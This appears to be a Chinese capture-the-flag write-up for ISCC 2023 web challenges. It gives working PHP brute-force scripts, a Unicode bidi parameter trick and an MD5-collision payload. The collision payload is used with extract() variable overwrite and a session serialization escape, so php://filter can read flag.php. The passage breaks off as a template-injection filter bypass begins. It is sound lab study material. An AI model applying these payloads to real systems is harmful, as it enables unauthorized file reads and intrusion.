首页 WP

# Web

# 羊了个羊

image-20230501130234361

网址前加上 view-source: 查看源码

image-20230501130347598

解码得到 flag

image-20230501130419360

# 小周的密码锁

页面上一个参数

image-20230523161457189

隐藏了一个参数,这里在前段写死了

image-20230523161447232

尝试修改值,到 5 的时候看见了源码

image-20230523161549377

<?php
    function MyHashCode($str)
    {
        $h = 0;
        $len = strlen($str);
        for ($i = 0; $i < $len; $i++) {
            $hash = intval40(intval40(40 * $hash) + ord($str[$i]));
        }
        return abs($hash);
    }
    
    function intval40($code)
    {
        $falg = $code >> 32;
        if ($falg == 1) {
            $code = ~($code - 1);
            return $code * -1;
        } else {
            return $code;
        }
    }
    function Checked($str){
        $p1 = '/ISCC/';
        if (preg_match($p1, $str)){
            return false;
        }
        return true;
    }
    function SecurityCheck($sha1,$sha2,$user){
        
        $p1 = '/^[a-z]+$/';
        $p2 = '/^[A-Z]+$/';
        if (preg_match($p1, $sha1) && preg_match($p2, $sha2)){
            $sha1 = strtoupper($sha1);
            $sha2 = strtolower($sha2);
            $user = strtoupper($user);
            $crypto = $sha1 ^ $sha2;
        }
        else{
            die("wrong");
        }       
        return array($crypto, $user);
    }
    error_reporting(0);
    
    $user = $_GET['username'];//user
    $sha1 = $_GET['sha1'];//sha1
    $sha2 = $_GET['‮⁦//sha2⁩⁦sha2'];
    //‮⁦see me ⁩⁦can you 
    if (isset ($_GET['password'])) {
        if ($_GET['password2'] == 5){
            show_source(__FILE__);
        }
        else{
            //Try to encrypt
            if(isset($sha1) && isset($sha2) && isset($user)){
                [$crypto, $user] = SecurityCheck($sha1,$sha2,$user);
                if((substr(sha1($crypto),-6,6) === substr(sha1($user),-6,6)) && (substr(sha1($user),-6,6)) === 'a05c53'){//welcome to ISCC
                    
                    if((MyHashcode("ISCCNOTHARD") === MyHashcode($_GET['password']))&&Checked($_GET['password'])){
                        include("f1ag.php");
                        echo $flag;
                    }else{
                        die("就快解开了!");
                    }
                    
                }
                else{
                    die("真的想不起来密码了吗?");
                }
            }else{
                die("密钥错误!");
            }
        }    
    }        
    mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 1e4) + rand(1, 1e4));
?>
这里有 Unicode 标准中定义的控制字符,这里传入 //sha2% E2%81% A9% E2%81% A6sha2 即可
image-20230523162310303
这里判断 sha1 大写,sha2 小写异或后得到 crypto,这里先将所有可能获取
<?php
$str1='abcdefghijklmnopqrstuvwxyz';
$str2='ABCDEFGHIJKLMNOPQRSTUVWXYZ';
for ($i=0;$i<strlen($str1);$i++){
    for ($j=0;$j<strlen($str2);$j++){
        echo "$str1[$i]$str2[$j]=====";
        echo $str1[$i]^$str2[$j];
        echo "\n";
    }
}
image-20230523165640284
这里能用的可见字符大概是 #"%$'&)(+*-,/.1032547698;!,用这几个字符爆破一下得到一个后 6 位达到题目要求的
<?php
$string = '#\"%$\'&)(+*-,/.1032547698!;';
$targetHash = 'a05c53';
for ($i = 0; $i < 999999999999999; $i++) {
    $randomString = '';
    $length = mt_rand(0, 9);
    for ($j = 0; $j < $length; $j++) {
        $randomChar = $string[mt_rand(0, strlen($string) - 1)];
        $randomString .= $randomChar;
    }
    if (substr(sha1($randomString), -6) === $targetHash) {
        echo $randomString . "\n";
    }
}
image-20230523171014503
这里选用一个最短的 79;4" 找到对应的字符,sha1=aaaaa&sha2=VXZUC
image-20230523162613992
这里 sha1 和 user 的值 sha 后,后 6 位相同同时为 a05c53
<?php
for($i=0;$i<9999999999;$i++){
    if(substr(sha1($i),-6,6)=="a05c53"){
        echo $i;
        echo "\n";
    }
}
image-20230523163133178
这些值都满足条件,取其一即可
image-20230523171458413
最后一个 if
image-20230523162841005
这里通过 MyHashcode 和 checked 检查 password
image-20230523171602567
image-20230523171613926
不能包含 ISCC,这里还是暴力一点,写一个脚本爆破一下
<?php
error_reporting(0);
function MyHashCode($str)
{
    $h = 0;
    $len = strlen($str);//11 // 字符串长度
    for ($i = 0; $i < $len; $i++) {
        $hash = intval40(intval40(40 * $hash) + ord($str[$i])); //40 次哈希
    }
    return abs($hash); // 取绝对值
}
function intval40($code) //40 位整数
{
    $falg = $code >> 32; // 判断是否为负数
    if ($falg == 1) { // 如果是负数
        $code = ~($code - 1); // 取反加一
        return $code * -1; // 取负数
    } else {
        return $code; // 正数
    }
}
$length = 4; // 指定生成的随机字符的位数
for ($j=0;$j<99999999;$j++) {
    $randomString = '';
    for ($i = 0; $i < $length; $i++) {
        $randomChar = chr(mt_rand(0, 255));
        $randomString .= $randomChar;
    }
    $randomString=urlencode($randomString);
//    echo urlencode($randomString)."\n";
    if (MyHashcode("ISCC")===MyHashcode(urldecode($randomString))){
        echo $randomString."\n";
    }
}
image-20230523182344443
最后的 payload
http://47.94.14.162:10008/?password=K%00%B8%BBNOTHARD&username=14987637&sha1=aaaaa&%E2%80%AE%E2%81%A6//sha2%E2%81%A9%E2%81%A6sha2=VXZUC
image-20230523182758546
# 老狼老狼几点了
这个时间因为信息很少,只能去尝试一下时间
image-20230523183128437
最后发现输入 12 会跳转到 guess_time.php
<?php
//"Hello! welcome to ISCC, wish you have a great time!";
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
echo time();
class what_time_is_it{
    protected $func, $target;
    public function __construct($show_time){
        $this->func = $show_time;
    }
    public function __wakeup(){
        echo "wakeup";
    }
    public function call_func(){
        $lets_show_time = unserialize($this->filter($this->func));
        if($lets_show_time['function'] == "show_time"){
            echo 'The time is: ". date("h:i:sa", time()). "<br>';
        }
        else if($lets_show_time['function'] == "hack"){
            file_put_contents('time.php', "<?php echo 'The time is: ". date("h:i:sa", time()). "<br>';");
            echo "做撚啊做,你还是看看时间吧";
            include($lets_show_time['file']);
        }
        else
            highlight_file(__file__);
    }
    private function filter($s){
        return preg_replace('/base64/i','', $s);
    }
    public function __destruct(){
        $this->call_func();
    }
}
if($_SESSION) unset($_SESSION);
$p1 = $_POST['param1'];
$p2 = $_POST['param2'];
$_SESSION['function'] = isset($_GET['func']) ? $_GET['func'] : "highlight_file";
$_SESSION['file'] = 'time.php';
if ($p1 !== $p2 && md5($p1) === md5($p2)){
    if (substr($p1, 0, 10) === strval(time())){
        echo "Just the time";
        extract($_POST);
        $_SESSION['file'] = 'time.php';
        $_SESSION['function'] = "show_time";
    }
    else{
        echo "Sorry wrong time!";
    }
}
$let_me_show_time = serialize($_SESSION)."<br>";
$a = new what_time_is_it($let_me_show_time);
先看 if
image-20230523183745040
md5 强碰撞,且 $p1 前 10 位等于当前时间戳这里使用 fastcoll 工具来生成 (78 条消息) 使用 fastcoll 生成字符串 MD5 碰撞_KogRow 的博客 - CSDN 博客
<?php 
function readmyfile($path){
$fh = fopen($path, "rb");
$data = fread($fh, filesize($path));
fclose($fh);
return $data;
}
system("E:\\webtools\\fastcoll_v1.0.0.5\\fastcoll_v1.0.0.5.exe ./1.txt");
$a = urlencode(readmyfile("./1_msg2.txt"));
$b = urlencode(readmyfile("./1_msg1.txt"));
unlink("./1_msg2.txt");
unlink("./1_msg1.txt");
echo "\n";
// if(md5((string)urldecode($a))===md5((string)urldecode($b))){
// echo $a."\n";
// }
// if(urldecode($a)!=urldecode($b)){
// echo $b;
// }
echo "param1=$a&param2=$b";
image-20230523185624197
image-20230523190635845
image-20230523190731282
这里进入了这个 if,所以需要让 $_session [‘function’] 不等于’show_time’而等于 hack
image-20230523191103945
这里是用 extract 函数接受 post 参数,直接变量覆盖,然后利用文件包含去读文件,利用 base64 进行字符串逃逸
<?php 
function readmyfile($path){
$fh = fopen($path, "rb");
$data = fread($fh, filesize($path));
fclose($fh);
return $data;
}
system("E:\\webtools\\fastcoll_v1.0.0.5\\fastcoll_v1.0.0.5.exe ./1.txt");
$a = urlencode(readmyfile("./1_msg2.txt"));
$b = urlencode(readmyfile("./1_msg1.txt"));
unlink("./1_msg2.txt");
unlink("./1_msg1.txt");
echo "\n";
// if(md5((string)urldecode($a))===md5((string)urldecode($b))){
// echo $a."\n";
// }
// if(urldecode($a)!=urldecode($b)){
// echo $b;
// }
echo "param1=$a&param2=$b&_SESSION[a]=base64base64base64&_SESSION[aaa]=;s:4:\"file\";s:62:\"php://filter/read=convert.iconv.utf-8.utf-16/resource=flag.php\";s:8:\"function\";s:4:\"hack\";s:8:\"function\";s:4:\"hack\";}";
最后的 payload
param1=1684843960%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%CA%BF%D7%60%1F6rcJ%9F%85%C7L%9CP%E6%26%B5C%E0%2F%12Z%F62Jy%F9%10%92%26%C3%93%0B%C1%E1%E8%E3%11%C1%C7%BF%BA%22%15%9E%1D%0D%8CRM%3A%7Cv%C8%FE%5E%F6P%24%DB%E4%D1L%04%0B%ED%22E%CAA%0F%E1%A3%FB%07%B1%8C%D2%8F%C6J%A9%FA%F8%F9%60U%CD%17%18%C5%5D%19%5D%B2%3B%29%DF%D6Y%B9%AD%07%85%8F%C0%AF%B0%91z%EC%DF%2C%03%AC%FCS%00b%AB%D4%23%C4S%DB%3Dg&param2=1684843960%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%CA%BF%D7%60%1F6rcJ%9F%85%C7L%9CP%E6%26%B5C%60%2F%12Z%F62Jy%F9%10%92%26%C3%93%0B%C1%E1%E8%E3%11%C1%C7%BF%BA%22%15%1E%1D%0D%8CRM%3A%7Cv%C8%FE%5E%F6P%A4%DB%E4%D1L%04%0B%ED%22E%CAA%0F%E1%A3%FB%07%B1%8C%D2%8F%C6J%A9z%F8%F9%60U%CD%17%18%C5%5D%19%5D%B2%3B%29%DF%D6Y%B9%AD%07%85%8F%C0%AF%B0%11%7B%EC%DF%2C%03%AC%FCS%00b%AB%D4%23DS%DB%3Dg&_SESSION[a]=base64base64base64&_SESSION[aaa]=;s:4:"file";s:62:"php://filter/read=convert.iconv.utf-8.utf-16/resource=flag.php";s:8:"function";s:4:"hack";s:8:"function";s:4:"hack";}
image-20230523201305959
# ChatGGG
image-20230523204412046
很有意思的一个题,很明显是模版注入,这里过滤了不少字符,大概差不多就下面这些
waf:_,class,or,+,*,init,base,global,builtin,.
image-20230523205058089
这里得到提示,就在 fllaaag.txt 里面,那么就很明显了,这里只要想办法绕过即可,关键字几乎都被过滤,这里考虑使用编码绕过,点号被过滤使用 attr 绕过
image-20230524012330774
成功了,这里开始构建 payload